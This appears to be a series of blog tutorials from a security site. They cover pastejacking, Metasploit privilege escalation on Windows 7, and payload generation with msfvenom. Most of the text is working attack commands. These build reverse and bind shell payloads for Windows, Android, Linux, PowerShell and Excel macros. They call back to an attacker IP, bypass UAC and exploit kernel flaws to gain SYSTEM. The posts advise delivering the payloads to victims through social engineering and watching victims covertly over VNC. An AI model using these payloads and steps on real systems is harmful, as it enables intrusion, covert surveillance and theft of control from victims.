After that, again choose option “1” under “Select Payload” to generate a windows reverse tcp shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”

You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.

And that’s it, your payload is ready.

You will now be asked to if you would like to turn on Handler, type “Y” and press enter

Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.

Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

The beauty of this tool lies in its simplicity, it has a clean interphase with an intuitive workflow and can get effective results without any mess.  The message section makes it easy to make your payload look as harmless as possible. This also goes to show how easy it is to get hacked, so stay vigilant.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Exploiting Remote machine with Pastejacking appeared first on Hacking Articles.

When you exploit the victim pc there would be certain limits which resist performing some action even after you are having the shell of victim’s pc. To get complete access of your victim pc; you need to bypass privilege escalation where a user receives privileges they are not authorize to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various other post exploits that will use a number of different techniques to attempt to gain system level privileges on the remote system.

 Requirement

Attacker: kali Linux

Victim PC: Windows 7 

 Open kali Linux terminal type msfconsole

Use payload for windows and start multi/handler for reverse connection. Once you hacked the victim pc now go for privilege escalation using following techniques

Windows Escalate UAC Protection Bypass

 Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

 Give a look at image when you will use getuid command it ask for user ID that is username: pc 10; after using getsystem now username is system. Again use getuid command now you are having admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

 Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call Exit Process () after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

 Available targets: Windows x32 and Windows x64 bit

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

 msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

 use getsystem command and then go for user ID by typing getuid command in meterpreter.

Windows Escalate UAC Execute RunAs

 Available targets: Windows x32 and Windows x64 bit

This module will attempt to elevate execution level using the Shell Execute undocumented Run As flag to bypass low UAC settings. Ask always uses a self-generated payload which is easily detected by AV. Click yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows x32 and Windows x64 bit

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

 Available targets: Windows x32 bit

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) >set session 1

msf exploit(ms16_016_webdav) > exploit

Use getsystem command in meterpreter for admin access of pc.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

 Available targets: Windows 732 bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shell code nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome’s sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

msf exploit(ms13_053_schlamperei) >set session 1

msf exploit(ms13_053_schlamperei) >exploit

 Use getsystem command and then go for user ID by typing getuid command in meterpreter

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post 7 Ways to Privilege Escalation of Windows 7 PC appeared first on Hacking Articles.

Hello friends!!

Today we will learn to create payloads from a popular tool known as metasploit, we will explore various option available within the tool to create payloads with different extensions and techniques.

Msfvenom

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

Requirements:

• Kali Linux
• Windows Machine
• Android Phone
• Linux Machine

Abbreviations:

Lhost= (IP of Kali)

Lport= (any port you wish to assign to the listener)

P= (Payload I.e. Windows, android, PHP etc.)

F= file extension (i.e. windows=exe, android=apk etc.)

Let’s Begin!!

From the Kali terminal type command msfvenom as shown below. It will show you all available options for creating a payload but in this article we are talking about different types of payload we can generate.

Bind shell

A bind shell is the kind that opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session

Now type the below “command” on your kali terminal

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the “exe” payload file on your desktop as specified on the command /root/Desktop/bind.exe We need to send this file to the victim machine through file share or by any social engineering technique and have it run on the system

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_tcp

msf exploit(handler) > set rhost IP 192.168.0.100

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Once the file is executed on the machine we will get the victim machine meterpreter session as show below:

The bind_tcp option is helpful in case we get disconnected from victim machine while it is still running, we can execute the same command and get back the session without any intervention of the victim to run the exploit again.

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

From the Kali terminal type command msfvenom as shown below:

Now type command

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > / root/Desktop/reverse_tcp.exe.

In this case we will include few other options such as lhost (local host) and lport (local port) to get a reverse connection from the victim machine

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost IP 192.168.0.107

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

We can confirm from the image below, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session successfully.

HTTPS Payload

Note: Both the above payloads can be used in case we have relevant ports active on the victim machine, so the question arises what if the victim has blocked all the ports?

Well in such cases we can create payloads as per the ports running on victim machine such as 443 for https:

Let’s us use this case and create a payload with https   From the Kali terminal type command msfvenom as shown below:

Now type command

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

Now let us start msfconsole and type below command to get session of victim machine

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_https

msf exploit(handler) > set lhost IP 192.168.0.107

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

We can confirm from the above image, once the payload is executed by the victim, we received a reverse connection and got the meterpreter session.

Hidden Bind TCP Payload

Let us now explore some other technique available in msfvenom Tool and try to exploit the victim machine, this time we will get the shell of the victim machine instead of meterpreter session

Let’s begin!!

This payload hides on the background silently, while executed and does not reveal its presence if scanned by any port scanner.

From the Kali terminal type command msfvenom as shown below:

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below.

We use Netcat to setup our listener.

Now from the kali Terminal let us type the command as shown above

nc 192.168.0.100 1010

Reverse Shell Payload with Netcat

Let us now do the same process and use shell_reverse_tcp payload, one more technique to get shell session of the victim

From the Kali terminal type command msfvenom as shown below:

msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below

We setup our listener using netcat, the image below confirms the shell session capture by the kali machine.

Now from the kali Terminal let us type the command as shown below.

nc -lvp 1111

Macro Payload

Let us now create a payload with a Vba script, which we will use to create a macro on Excel to exploit victim machine.

Let us begin to create the payload!!

Open Kali Terminal and type command as mention below:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

once the command is executed copy the script starting from “#if vba 7 till “End if” as highlighted in below image:

Let us now open an excel file and press alt+F11 key to open VB script, you will get the option box as shown above, enter the name you will like to provide and click on “create”.

You will get a new option box as above, click on “This workbook” and replace the values with your copied vb script payload generated by msfvenom tool and close the vb script editor and enable the macro.

Now you may draft your excel file with relevant data which may look realistic for an victim to open the file, in our case we have just inserted the value “Test”  save the file and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost=192.168.0.107

msf exploit(handler) > set lport= 7777

msf exploit(handler) > exploit

Once the excel file is opened by the victim, it will prompt the victim to enable the macro, once enabled, our vbscript will get executed to provide us with reverse connection to the victim machine as show in the below image.

VNC Payload

Will it not be great if we can take the remote of victim machine without their knowledge and observe their activity anonymously,  this payload does exactly that , let us use it to our benefit.

Let us begin to create the payload!! Open Kali Terminal and type command as mention below:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and send to the victim for execution, we will start our next step as shown below. To capture the sessions let us now start the multi handler as stated below:

Open kali Terminal and type msfconsole

msf exploit(handler) > use exploit/multi/handler

msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport= 5900

msf exploit(handler) > exploit

We can see that reverse connection has executed the VNC injection and the victim remote machine session is established on our kali machine showing Remote Desktop.

Android Payload

Exploiting handheld devices have always been as hot topic and still continues, hence we have included it in our article as well, let us use one of the android exploit available within the msfvenom tool and use it to our benefit.

Let’s begin

Open Kali Terminal and type command as mention below:

msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

Once the payload gets generated send it to the victim to execute on his handheld, and start multi handler as shown in below image.

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 8888

msf exploit(handler) > exploit

Once the payload gets executed, you will get the meterpreter session of the handheld, which is now in your control as shown below.

Linux Payload

Open Kali Terminal and type command as mention below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

Once the payload gets generated send it to the victim to execute on his Linux machine and start multi handler as shown in below image.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lhost 4444

msf exploit(handler) > run

Once the payload gets executed, it will create a reverse tcp connection on our kali machine providing us with meterpreter sessions, as shown on the image below.

Powershell Payload

Open Kali Terminal and type command as mention below:

msfvenom -p cmd/windows/reverse_powershell  lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

Once the payload gets generated send it to the victim to execute on his windows machine and start multi handler as shown in below image.

msf > use multi/handler

msf exploit(handler) > set payload cmd/windows/reverse_powershell

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload gets executed, it will create a reverse connection to shell as shown in the image below.

Author: Krishnan Sharma is a technology professional having passion for information security and related fields, he loves technical writing and is part of our hacking article team, he may be contacted Here

The post Msfvenom Tutorials for Beginners appeared first on Hacking Articles.